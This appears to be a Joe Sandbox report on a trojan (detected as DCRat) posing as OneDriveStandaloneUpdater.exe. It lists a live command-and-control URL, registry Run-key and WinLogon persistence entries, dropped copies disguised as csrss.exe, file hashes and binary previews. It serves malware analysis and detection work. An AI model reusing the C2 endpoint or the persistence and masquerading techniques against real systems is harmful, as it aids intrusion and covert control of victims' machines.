http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000D.00000002.1452930808.0000016126919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1445400523.000001CAA9088000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1445287569.000001F1A1F58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1448436376.000001EDA2E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1445458856.0000024BD2077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1443825625.0000016FE65C7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000016.00000002.1443825625.0000016FE65C7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000D.00000002.1452930808.0000016126919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1445400523.000001CAA9088000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1445287569.000001F1A1F58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1448436376.000001EDA2E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1445458856.0000024BD2077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1443825625.0000016FE65C7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000016.00000002.2537495430.0000016FF6417000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000D.00000002.2612884415.0000016136767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2588818715.000001CAB8ED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2706402857.000001F1B1DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2781554792.000001EDB2CB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2647889757.0000024BE1EC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2537495430.0000016FF6417000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000016.00000002.2537495430.0000016FF6417000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000016.00000002.2537495430.0000016FF6417000.00000004.00000800.00020000.00000000.sdmp	false		high
http://574565cm.renyash.top	csrss.exe, 00000020.00000002.1467210557.0000000002763000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002678000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000003F.00000002.2004087524.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.000000000321A000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://574565cm.renyash.top/	csrss.exe, 00000043.00000002.2011549041.000000000321A000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://aka.ms/pscore68	powershell.exe, 0000000D.00000002.1452930808.00000161266F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1445400523.000001CAA8E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1445287569.000001F1A1D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1448436376.000001EDA2C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1445458856.0000024BD1E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1443825625.0000016FE63A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	OneDriveStandaloneUpdater.exe, 00000000.00000002.1328499535.0000000002C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1452930808.00000161266F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1445400523.000001CAA8E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1445287569.000001F1A1D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1448436376.000001EDA2C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1445458856.0000024BD1E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1443825625.0000016FE63A1000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002763000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002678000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000003F.00000002.2004087524.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.000000000321A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000016.00000002.1443825625.0000016FE65C7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.mic	OneDriveStandaloneUpdater.exe, 00000000.00000002.1312941189.0000000000805000.00000004.00000020.00020000.00000000.sdmp	false		high
http://574565cm.renyash.top/LongpollserverFlowerasyncCdn.php	csrss.exe, 00000020.00000002.1467210557.0000000002763000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002678000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000003F.00000002.2004087524.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.000000000321A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ipinfo.io/ip	OneDriveStandaloneUpdater.exe, 00000000.00000002.1316360942.0000000000A62000.00000002.00000001.01000000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002931000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000033BD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000034D4000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.0000000002791000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000031F3000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002961000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002977000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002846000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.0000000003500000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, EERPqGGD.log.41.dr, sjwHPvrg.log.32.dr	false		high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589978
Start date and time:	2025-01-13 12:43:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	78
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	OneDriveStandaloneUpdater.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@110/127@15/0
EGA Information:	Successful, ratio: 72.7%
HCA Information:	Successful, ratio: 82% Number of executed functions: 311 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target MjlsqDcSPlv.exe, PID 400 because it is empty
Execution Graph export aborted for target OneDriveStandaloneUpdater.exe, PID 7436 because it is empty
Execution Graph export aborted for target csrss.exe, PID 2760 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:44:07	API Interceptor	170x Sleep call for process: powershell.exe modified
06:44:20	API Interceptor	4x Sleep call for process: csrss.exe modified
07:56:03	API Interceptor	2x Sleep call for process: MjlsqDcSPlv.exe modified
07:56:12	API Interceptor	1x Sleep call for process: OneDriveStandaloneUpdater.exe modified
12:44:09	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Users\All Users\Documents\csrss.exe"
12:44:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv "C:\Users\user\NetHood\MjlsqDcSPlv.exe"
13:55:35	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDriveStandaloneUpdater "C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe"
13:55:43	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Users\All Users\Documents\csrss.exe"
13:55:52	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv "C:\Users\user\NetHood\MjlsqDcSPlv.exe"
13:56:00	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDriveStandaloneUpdater "C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe"
13:56:09	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Users\All Users\Documents\csrss.exe"
13:56:18	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv "C:\Users\user\NetHood\MjlsqDcSPlv.exe"
13:56:27	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run OneDriveStandaloneUpdater "C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe"
13:56:44	Autostart	Run: WinLogon Shell "C:\Users\All Users\Documents\csrss.exe"
13:56:53	Autostart	Run: WinLogon Shell "C:\Program Files\Windows Mail\MjlsqDcSPlv.exe"
13:57:02	Autostart	Run: WinLogon Shell "C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe"
13:57:10	Autostart	Run: WinLogon Shell "C:\Users\Public\MjlsqDcSPlv.exe"
13:57:18	Autostart	Run: WinLogon Shell "C:\Users\user\NetHood\MjlsqDcSPlv.exe"
13:57:27	Autostart	Run: WinLogon Shell "C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe"

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	4.448520842480604
Encrypted:	false
SSDEEP:	24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
MD5:	B5189FB271BE514BEC128E0D0809C04E
SHA1:	5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
SHA-256:	E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
SHA-512:	F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
Malicious:	false
Preview:	.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.884786113237298
Encrypted:	false
SSDEEP:	48:6LmZt5xZ8RxeOAkFJOcV4MKe28d8yvqBHjuulB+hnqXSfbNtm:/mxvxVx9cyvkVTkZzNt
MD5:	064D5FDC68CC52A35125C695D97ABC7A
SHA1:	0BD13FAE54DB1DFB205994FAF7C19F73188CA111
SHA-256:	8A0A8F1C0EF45DE27E717713677891F7CE6A8F684D53E50A7AB89261F5375391
SHA-512:	E6107954B3776C710506122C71F627F8787F7717F0B11A6367F06050844583A2DBAB6C0B48427243EE8E593415EC6CD2042C7F3F21B9947AB8ECF908A0303316
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..g.............................'... ...@....@.. ....................................@.................................H'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!.. .............................................................(.....0..!.......r...pr...p.{....(....(....&..&......................0..........r...p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848896
Entropy (8bit):	5.45838062222636
Encrypted:	false
SSDEEP:	12288:P6TnOzi5kaag8hpT77JJMA+XSpW3Ari4VVyZC0+1cw2jINof7+vEnkdsOZ6:P6TnYa+T7dJMA+i3iE0nHfW6
MD5:	C1F1BEA182F1C3477C2F133C3AC26930
SHA1:	2145C09D2C3279AC83E844C4D80E7AA219E99B8D
SHA-256:	1054AF5E9206AA0CB650A4E58900BCD369A554E64EAA89F56CB35CD105386EB5
SHA-512:	6AF6336782B29BDAB906E4D289CB5C2C8500BA8A20DEE53DEF21960E62AFC28EC6756B746B4E4036A30726984A60B656B3D529B4ABC119953267E91BE4992A4D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f............................N.... ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc... .... ......................@..@.reloc.......@......................@..B................0.......H.......X....@......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Microsoft Office 15\ClientX64\ef091392c4842d

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	ASCII text, with very long lines (448), with no line terminators
Category:	dropped
Size (bytes):	448
Entropy (8bit):	5.850666449311575
Encrypted:	false
SSDEEP:	12:hZwEy7biAxd3zc47DTR5jqQOy6yXnArwqrrk:h07bVpzcMRR6yzArwqM
MD5:	6AA7FDD274E7B0A7C8B4D32A346C62EB
SHA1:	2D7CC04A38C528E0CEC700F1703136674190B168
SHA-256:	406A5F3A4EA265B3361396EC6F5A50E5CC0CE3C87FA62630A29A64975738D998
SHA-512:	EA72FFBDC64356DFA1BC469F319F1EC0A16AAE8B2A7561ED484F6E7B666277B322577524E9187B57682F0D4BF8A5D478F3F87B75DBF4D708B5A74799C93720C3
Malicious:	false
Preview:	p4cmP20txG08aQMf3r9J4mH2mBfbxFqNLnJrRDUeqwtAArF6il9jO6gCwj9OWY5rZmwxHeO0WfcI3H145i2MGH9PGG5rDFHR0BkY5SzEWJMtdYJpsFSxgtkRngrAjhwRXKR1gd8ntyz75Qwr7P88wTvHaSuZkyezW4VSHRIPGpEr3nWXu9DTixeDZKbNsjC5TAkA4dkqGt2HPDNx6XplvLRiaR3605ggmJY2CWcQZXNy5XyV6nRU4bKItCkmknzLMVfGpUuk4YLY8cnDdhAMnMmL9QJAvzqvhBlj1rql2rZfQvKQYhJCnnhAtTHZLuyFsZ060DLv1YT6wG5NG3lOqoI3dk0ikRaI3Ux05NZVWYKPTlOmY4TSJjYER6cPNnKk8LDbTER2dQ2Rd3k2WNJq7I9T5tj8uJHsNjRIhwTUmay2rGkYWj39demzLtfkfTHT

C:\Program Files\Windows Mail\MjlsqDcSPlv.exe

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848896
Entropy (8bit):	5.45838062222636
Encrypted:	false
SSDEEP:	12288:P6TnOzi5kaag8hpT77JJMA+XSpW3Ari4VVyZC0+1cw2jINof7+vEnkdsOZ6:P6TnYa+T7dJMA+i3iE0nHfW6
MD5:	C1F1BEA182F1C3477C2F133C3AC26930
SHA1:	2145C09D2C3279AC83E844C4D80E7AA219E99B8D
SHA-256:	1054AF5E9206AA0CB650A4E58900BCD369A554E64EAA89F56CB35CD105386EB5
SHA-512:	6AF6336782B29BDAB906E4D289CB5C2C8500BA8A20DEE53DEF21960E62AFC28EC6756B746B4E4036A30726984A60B656B3D529B4ABC119953267E91BE4992A4D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f............................N.... ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc... .... ......................@..@.reloc.......@......................@..B................0.......H.......X....@......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Program Files\Windows Mail\MjlsqDcSPlv.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Windows Mail\ef091392c4842d

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	ASCII text, with very long lines (341), with no line terminators
Category:	dropped
Size (bytes):	341
Entropy (8bit):	5.796286084847232
Encrypted:	false
SSDEEP:	6:+Qi00coAO0foUHyGkrjP41fvQJO7uz+G6pvLWSYJ4ZnqaEHNod:qzwoeyLP44/zGpqGcNod
MD5:	2A1A86C7B01110F4FF1A6D4112638C10
SHA1:	DDF928093227B93BDB437E479E7A876D2C49A27F
SHA-256:	558449697E2E1E6C19FAD2FD846BFA5FAF973B67860FCD07D1391EBA5F3E4173
SHA-512:	AAA9E46BA212360378106D6BB7AF94E092B64C3BDFAE79D95164E0DFCD4E19A83600F82EB5D8837ECBCDC807F1CB36C2C5DB0E4A249EE228316F30E2FDCFF3CE
Malicious:	false
Preview:	k4zDhTGmzILlLQHPt7b7yQtyTSfthCqv5PTFoaFgFHqbUr6CA4V6KegTLAuOyWFwcZq57CkS141rjSelWctmrtlbs94oq1rsC485BAF8TCFQmzt2fI1VncEsyPN8I6lAMJppTjkVXuTooUy3PBIi9WEjzPGvxHzXbFDcKEj6hg82JaEdaTsGxDA0FFzDcyiP55NjRWtLcMAdXLaZLnVdYtkXEMXEOfds7s7NMeLEkholDhd3oa2ydE0LVzfF9o66sRfoNMMqcR21E8UgtdaxnpP31v2W9FE6kr3vCyqcOLWMM8HWf8WfNITDClwbTzqWM5RXFjd4w8jbTCr2og1Bt

C:\Users\Public\Documents\886983d96e3d3e

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	144
Entropy (8bit):	5.616988133784109
Encrypted:	false
SSDEEP:	3:Rcu11PURgTwvoEDRHN1Tvwe6NCiprsV2GS8KxR0F7gNnJsUan:l1sRCww4Rbwem6YGykF7gNnJsUa
MD5:	95723FBB71B552DD9347FE7C10B7C6B3
SHA1:	FE93E785B133430798E6D81DE5E05EBFA59DCA61
SHA-256:	5E2336F4307EC5E0929AB68BF4780D93B4EBB021CA55EEEFA8904A73872E39B7
SHA-512:	87268B14E423231C14D4A4FB7B0A98F6A892DA803906406E6FAC3A2FFAAE88D0EDA178571799577AB47514C9452DB8119887F8DA8E1F05E3123A2E7DEEE0A45F
Malicious:	false
Preview:	Ye99QrtQ6ebsPj1t943wx7pmnMz9PzD2izK7TDaL5P5gS0d2gGtfHcUayWWD1uBGbiKaY4a6es1iCJUxt7dJGhvGetI7qWTLNzEtpDelpxBZkwYoBiU4Q194xE5ovdPHYqUNFkIqc1dTfWfr

C:\Users\Public\Documents\csrss.exe

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848896
Entropy (8bit):	5.45838062222636
Encrypted:	false
SSDEEP:	12288:P6TnOzi5kaag8hpT77JJMA+XSpW3Ari4VVyZC0+1cw2jINof7+vEnkdsOZ6:P6TnYa+T7dJMA+i3iE0nHfW6
MD5:	C1F1BEA182F1C3477C2F133C3AC26930
SHA1:	2145C09D2C3279AC83E844C4D80E7AA219E99B8D
SHA-256:	1054AF5E9206AA0CB650A4E58900BCD369A554E64EAA89F56CB35CD105386EB5
SHA-512:	6AF6336782B29BDAB906E4D289CB5C2C8500BA8A20DEE53DEF21960E62AFC28EC6756B746B4E4036A30726984A60B656B3D529B4ABC119953267E91BE4992A4D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Public\Documents\csrss.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f............................N.... ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc... .... ......................@..@.reloc.......@......................@..B................0.......H.......X....@......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\Public\Documents\csrss.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Public\MjlsqDcSPlv.exe

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848896
Entropy (8bit):	5.45838062222636
Encrypted:	false
SSDEEP:	12288:P6TnOzi5kaag8hpT77JJMA+XSpW3Ari4VVyZC0+1cw2jINof7+vEnkdsOZ6:P6TnYa+T7dJMA+i3iE0nHfW6
MD5:	C1F1BEA182F1C3477C2F133C3AC26930
